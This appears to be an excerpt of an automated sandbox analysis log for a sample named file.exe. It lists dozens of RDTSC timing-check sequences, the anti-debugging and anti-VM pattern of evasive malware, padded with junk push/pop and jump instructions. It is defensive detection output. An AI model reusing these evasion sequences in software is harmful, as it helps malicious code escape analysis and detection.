                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9505 second address: EF952A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 jl 00007FBBA8502ABEh 0x0000000d jnc 00007FBBA8502AB6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBBA8502ABDh 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9AAD second address: EF9AC9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBBA93ED298h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBBA93ED29Bh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFA05B second address: EFA077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFA077 second address: EFA07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFEB38 second address: EFEB55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBBA8502AC3h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01C7E second address: F01C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01C84 second address: F01CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC3h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01E4F second address: F01E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0268B second address: F02696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02696 second address: F0269C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F027E3 second address: F027ED instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F027ED second address: F02815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 ja 00007FBBA93ED298h 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A1AE second address: F0A1D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FBBA8502AB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBBA8502AC9h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A819 second address: F0A81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A81F second address: F0A82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBBA8502AB8h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AF8A second address: F0AF9B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AF9B second address: F0AFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AFB8 second address: F0AFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AFBC second address: F0AFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AFC0 second address: F0AFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBBA93ED296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007FBBA93ED29Ch 0x00000014 pop esi 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop esi 0x0000001b push eax 0x0000001c ja 00007FBBA93ED296h 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jbe 00007FBBA93ED296h 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AFF2 second address: F0AFF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B14E second address: F0B152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B152 second address: F0B158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C02C second address: F0C044 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBA93ED296h 0x00000008 jno 00007FBBA93ED296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007FBBA93ED2A2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E54A second address: F0E54E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E54E second address: F0E55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E55A second address: F0E55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E55E second address: F0E574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FBBA93ED296h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E574 second address: F0E57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E57A second address: F0E57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0FCB0 second address: F0FCB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14849 second address: F1484E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F226B3 second address: F226BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBBA8502AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25061 second address: F25065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BA3 second address: F26BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BA7 second address: F26BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FBBA93ED2A6h 0x0000000c pop ebx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BC5 second address: F26BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBBA8502AB6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BD1 second address: F26BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BD5 second address: F26BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502ABAh 0x0000000d jmp 00007FBBA8502ABAh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2EB2E second address: F2EB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FBBA93ED296h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2EB3D second address: F2EB4D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FBBA8502AB8h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30E57 second address: F30E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FBBA93ED2A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30E6E second address: F30E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FBBA8502AB8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39382 second address: F39386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39386 second address: F393B0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBBA8502AB6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FBBA8502ACBh 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007FBBA8502AC3h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F393B0 second address: F393B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F393B5 second address: F393CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502ABCh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F393CA second address: F393D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40A10 second address: F40A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40A14 second address: F40A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40A18 second address: F40A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBBA8502AC4h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F4B4 second address: F3F4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A5h 0x00000009 jg 00007FBBA93ED296h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F4D8 second address: F3F4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F4DC second address: F3F4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F629 second address: F3F634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FBBA8502AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F634 second address: F3F63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F63D second address: F3F647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBBA8502AB6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F647 second address: F3F65E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBBA93ED296h 0x00000008 jnl 00007FBBA93ED296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F65E second address: F3F662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F662 second address: F3F666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F666 second address: F3F692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBBA8502AC3h 0x0000000c jmp 00007FBBA8502AC0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F692 second address: F3F6AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBBA93ED2A1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F961 second address: F3F99F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC7h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007FBBA8502AB6h 0x00000012 jmp 00007FBBA8502AC7h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F99F second address: F3F9BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FBBA93ED296h 0x0000000a jmp 00007FBBA93ED2A2h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F9BB second address: F3F9CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502ABDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3FC72 second address: F3FCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBBA93ED296h 0x0000000a pop edx 0x0000000b jg 00007FBBA93ED2A2h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop ebx 0x00000018 jmp 00007FBBA93ED29Eh 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F407AE second address: F407B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F407B2 second address: F407C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBBA93ED296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45206 second address: F45234 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBA8502ABEh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBBA8502AC9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F57E1E second address: F57E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6705A second address: F6706B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jne 00007FBBA8502AB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6706B second address: F67070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67070 second address: F67076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67076 second address: F6707A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6707A second address: F6707E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F69260 second address: F69266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EB53 second address: F7EB6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBBA8502ABEh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EB6B second address: F7EB71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7ECCA second address: F7ECEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBBA8502AC0h 0x0000000b popad 0x0000000c pushad 0x0000000d jnc 00007FBBA8502AB6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7ECEC second address: F7ECF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7ECF1 second address: F7ECFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EFB5 second address: F7EFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FBBA93ED298h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EFC2 second address: F7EFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EFC8 second address: F7EFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A8h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F439 second address: F7F460 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBBA8502AC7h 0x00000008 jl 00007FBBA8502AB6h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F460 second address: F7F464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F80F94 second address: F80F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F826F8 second address: F8270F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBBA93ED29Ah 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84FEE second address: F84FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84FF4 second address: F84FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84FF8 second address: F84FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F850B3 second address: F850B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F850B8 second address: F850C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA8502ABDh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85262 second address: F8526C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBBA93ED296h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F852EC second address: F85356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC9h 0x0000000d pop edx 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FBBA8502AB8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D19EEh], edi 0x0000002f push 00000004h 0x00000031 add dword ptr [ebp+122D19ABh], ecx 0x00000037 push 520A8012h 0x0000003c pushad 0x0000003d jmp 00007FBBA8502AC2h 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
